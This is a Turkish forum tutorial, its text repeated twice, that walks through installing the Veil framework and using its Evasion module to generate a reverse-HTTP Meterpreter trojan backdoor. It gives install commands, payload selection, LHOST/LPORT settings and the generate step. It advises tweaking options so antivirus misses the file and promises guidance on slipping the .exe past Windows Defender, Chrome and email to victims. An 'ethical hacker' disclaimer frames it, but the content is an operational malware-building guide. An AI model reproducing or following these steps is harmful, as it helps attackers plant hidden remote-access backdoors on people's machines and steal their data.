Ma name is enough
Süper Üye
Merhaba,
Bugün sizlerle 'Etik Hacker' adı altında backdoor(arka kapı) oluşturmayı ve bu backdoorların nasıl oluşturulduğu, önemlemlerin nasıl alınacağı hakkında konuşacağız.
Öncelikle Veil nedir bundan bahsetelim;
Veil, Linux tabanlı işletim sistemi üzerinde bazı payloadların tool içerisinde hazır şekilde sunulmasını sağlayan ve Trojan oluşturmamıza olanak tanıyan bir yazılımdır. Bu yazılım Antivirüslerdeki açıkların belirlenmesi, güvenlik açıklarının kapatılması gibi birçok alanda kullanılabilir. Daha önce de bahsettiğimiz gibi, "Hırsızı yakalamak için hırsız gibi düşünebilmek gerekir" bunun için tüm metod ve toolları öğrenmekte fayda var. Anlatılan konu üzerinde illegal yapılan hiçbir işlem için SORUMLULUK KABUL ETMİYORUM.
Tamamen bilgilendirme amacı ile Etik Hacker yolunda ilerlemenizi temenni ederim. Bu tarz işlemlere "şaka" yolu ile yapılması farketmeksizin büyük cezai işlemler uygulandığını aklınızdan çıkarmayın. İllegal değil, legal davranışlarda bulunun.
Şimdi yavaş yavaş Veil kurulumu ve kullanımına geçebiliriz.
İlk önce
Linux Terminalimizi açarak yapacağımız işlemler sırası ile şunlardır.
-
-
.. daha sonrasında kurulum için gerekli git komutlarını işleyeceğiz.
-
-
-
Kurulum işlemleri 15-20 dakika arasında sürebilir, "hacker olmanın en ince noktası sabırdır
"
Kurulum tamamlandıktan sonra tekrar yeni bir terminal açarak Veil yazmanız yeterli olacaktır. Daha sonra kullanacağımız aracın arayüzü karşımıza çıkacak.
Bu arayüz içerisinde 2 adet payload önümüze gelecek, bunlar Evasion ve Ordnance, bunlardan bizim genellikle Trojan backdoor oluştururken kullanacağımız tool(araç) Evasion olacaktır.
Akabinde "use 1" seçeceği seçtiğimizde (Command kısmında hangi işlemler ile tool arası geçiş yapabileceğiniz ve kullanabileceğiniz belirtilmiştir.) Evasion içerisine girerek, 41 adet payload karşımıza çıkmaktadır. (Payload ne demek? : Payload, bizlerin oluşturacağı backdoor'ların kullanılmasını sağlayan kodlardır)
"List" komutunu kullanarak payloadları listeliyoruz.
Karşımıza çıkan ekranda örneğin
Ruby: Bir programlama dilidir, kullanacağımız yazılımın hangi programlama dili ile yazıldığını bize gösterir ve ilk başta yer alır.
Meterpreter: İşlemi gerçekleştirip karşı tarafa bu backdoor'u yedirdikten sonra elde edeceğimiz "session"ları (yani "alınan bilgiler" olarak isimlendirebiliriz) buradan izleyeceğiz. Kullandığımız asıl program bu olacak.
rev_http.py : Bu aşama ise Method olarak isimlendirilir. Reverse http, yani ters connection; ters bağlantı anlamına gelir. Http'yi kullanarak hedef bilgisayara bağlanmak yerine hedef pc'nin dönüp bize bağlanmasını sağladığımız yerdir.
Bunları da anladığımıza göre şimdi bir adet backdoor oluşturalım...
Açılan pencereden kullanmak istediğimiz payload'ı seçerek örneğin; "use 14" yazarak, payload'ın içerisine girerek aktarım yapacağımız options'ları değiştirebiliriz.
Ne kadar fazla options değiştirirsek ve denersek Antivirüslere yakalanma olasılığı o kadar düşecektir.
Bizim ilk başta bunlardan ziyade, göreceğimiz en önemli husus LPORT ve LHOST kısımlarıdır. Burada LHOST kısmını değiştirmek için(bkz: LHOST işlem yapılacak IP adresidir, yani kendi IP adresimiz)
Ardından LPORT değiştireceğiz.(Bu da işlem yapılan PORT üzerinde çakışma olmaması için 4444- 8080- 5555 gibi port adreslerini yazarak işlem yapmamıza olanak sağlar ve daha doğru, temiz parametreler çalıştırır.)
LPORT değiştirmek için aynı komut üzerinden
Bu işlemi de onayladıktan sonra yaklaşık 15-20 saniye içerisinde yeni backdoor oluşturulacak ve karşımıza çıkan ekranda hangi yol üzerine kaydettiği gösterilecektir.
Bunun gibi birçok tool ve yöntem mevcut. Bunlardan sadece birini anlatarak nasıl yapacağınız konusunda fikrinizi oluşturmuş olduk. İlerleyen zamanlarda bu oluşturulan .exe dosyasını Windows makinelerde ve daha üst düzey şekilde Android İşletim sistemlerinde nasıl kullanılacağını da işleyeceğiz. Antivirüslere yakalanmaması, Windows Def.'in algılamaması, Chrome üzerinden hata vermemesi ve e-mail üzerinde bunu nasıl yedireceğiniz hakkında birçok konuya değineceğiz.
Tekrar görüşmek üzere
WHY? Hepinize iyi günler, iyi çalışmalar diler.
Bugün sizlerle 'Etik Hacker' adı altında backdoor(arka kapı) oluşturmayı ve bu backdoorların nasıl oluşturulduğu, önemlemlerin nasıl alınacağı hakkında konuşacağız.
Öncelikle Veil nedir bundan bahsetelim;
Veil, Linux tabanlı işletim sistemi üzerinde bazı payloadların tool içerisinde hazır şekilde sunulmasını sağlayan ve Trojan oluşturmamıza olanak tanıyan bir yazılımdır. Bu yazılım Antivirüslerdeki açıkların belirlenmesi, güvenlik açıklarının kapatılması gibi birçok alanda kullanılabilir. Daha önce de bahsettiğimiz gibi, "Hırsızı yakalamak için hırsız gibi düşünebilmek gerekir" bunun için tüm metod ve toolları öğrenmekte fayda var. Anlatılan konu üzerinde illegal yapılan hiçbir işlem için SORUMLULUK KABUL ETMİYORUM.
Tamamen bilgilendirme amacı ile Etik Hacker yolunda ilerlemenizi temenni ederim. Bu tarz işlemlere "şaka" yolu ile yapılması farketmeksizin büyük cezai işlemler uygulandığını aklınızdan çıkarmayın. İllegal değil, legal davranışlarda bulunun.
Şimdi yavaş yavaş Veil kurulumu ve kullanımına geçebiliriz.
İlk önce
Bağlantıları görmek için lütfen
Giriş Yap
linki üzerinden Veil'in GitHub sayfasına erişerek kurulum için ilk adımı atabiliriz. Sonrasında kurulum için bahsedilen adımlar açıkça belirtilmesine rağmen sizlere adım adım ben de burada anlatıyor olacağım.Linux Terminalimizi açarak yapacağımız işlemler sırası ile şunlardır.
-
sudo apt-get update-
sudo apt-get upgrade.. daha sonrasında kurulum için gerekli git komutlarını işleyeceğiz.
-
sudo apt-get -y install git-
git clone https://github.com/Veil-Framework/Veil.git-
./config/setup.sh --force --silentKurulum işlemleri 15-20 dakika arasında sürebilir, "hacker olmanın en ince noktası sabırdır
"Kurulum tamamlandıktan sonra tekrar yeni bir terminal açarak Veil yazmanız yeterli olacaktır. Daha sonra kullanacağımız aracın arayüzü karşımıza çıkacak.
Bu arayüz içerisinde 2 adet payload önümüze gelecek, bunlar Evasion ve Ordnance, bunlardan bizim genellikle Trojan backdoor oluştururken kullanacağımız tool(araç) Evasion olacaktır.
Akabinde "use 1" seçeceği seçtiğimizde (Command kısmında hangi işlemler ile tool arası geçiş yapabileceğiniz ve kullanabileceğiniz belirtilmiştir.) Evasion içerisine girerek, 41 adet payload karşımıza çıkmaktadır. (Payload ne demek? : Payload, bizlerin oluşturacağı backdoor'ların kullanılmasını sağlayan kodlardır)
"List" komutunu kullanarak payloadları listeliyoruz.
Karşımıza çıkan ekranda örneğin
Ruby/meterpreter/rev_http.py'yi göreceğiz. Bu ne anlama geliyor? Ne işe yarıyor biraz bundan bahsedelim.Ruby: Bir programlama dilidir, kullanacağımız yazılımın hangi programlama dili ile yazıldığını bize gösterir ve ilk başta yer alır.
Meterpreter: İşlemi gerçekleştirip karşı tarafa bu backdoor'u yedirdikten sonra elde edeceğimiz "session"ları (yani "alınan bilgiler" olarak isimlendirebiliriz) buradan izleyeceğiz. Kullandığımız asıl program bu olacak.
rev_http.py : Bu aşama ise Method olarak isimlendirilir. Reverse http, yani ters connection; ters bağlantı anlamına gelir. Http'yi kullanarak hedef bilgisayara bağlanmak yerine hedef pc'nin dönüp bize bağlanmasını sağladığımız yerdir.
Bunları da anladığımıza göre şimdi bir adet backdoor oluşturalım...
Açılan pencereden kullanmak istediğimiz payload'ı seçerek örneğin; "use 14" yazarak, payload'ın içerisine girerek aktarım yapacağımız options'ları değiştirebiliriz.
Ne kadar fazla options değiştirirsek ve denersek Antivirüslere yakalanma olasılığı o kadar düşecektir.
Bizim ilk başta bunlardan ziyade, göreceğimiz en önemli husus LPORT ve LHOST kısımlarıdır. Burada LHOST kısmını değiştirmek için(bkz: LHOST işlem yapılacak IP adresidir, yani kendi IP adresimiz)
set LHOST 10.0.2.15(sizin IP adresiniz ne ise onu yazmanız gerekir) yazarak LHOST'u değiştirebiliriz.Ardından LPORT değiştireceğiz.(Bu da işlem yapılan PORT üzerinde çakışma olmaması için 4444- 8080- 5555 gibi port adreslerini yazarak işlem yapmamıza olanak sağlar ve daha doğru, temiz parametreler çalıştırır.)
LPORT değiştirmek için aynı komut üzerinden
set LPORT 8080 yazıyoruz ve Enter ile onaylıyoruz. İşlemler okeylendikten sonra, backdoor'u oluşturmak içingenerate komutunu kullanıyoruz ve biraz bekledikten sonra karşımıza çıkan kısımda oluşturduğumuz backdoor için bir isim belirliyoruz. (örnekler: newpayload, yenipy, osman123 vb. istediğiniz tüm isimleri kullanabilirsiniz.)Bu işlemi de onayladıktan sonra yaklaşık 15-20 saniye içerisinde yeni backdoor oluşturulacak ve karşımıza çıkan ekranda hangi yol üzerine kaydettiği gösterilecektir.
Bunun gibi birçok tool ve yöntem mevcut. Bunlardan sadece birini anlatarak nasıl yapacağınız konusunda fikrinizi oluşturmuş olduk. İlerleyen zamanlarda bu oluşturulan .exe dosyasını Windows makinelerde ve daha üst düzey şekilde Android İşletim sistemlerinde nasıl kullanılacağını da işleyeceğiz. Antivirüslere yakalanmaması, Windows Def.'in algılamaması, Chrome üzerinden hata vermemesi ve e-mail üzerinde bunu nasıl yedireceğiniz hakkında birçok konuya değineceğiz.
Tekrar görüşmek üzere
WHY? Hepinize iyi günler, iyi çalışmalar diler.
Son düzenleme:
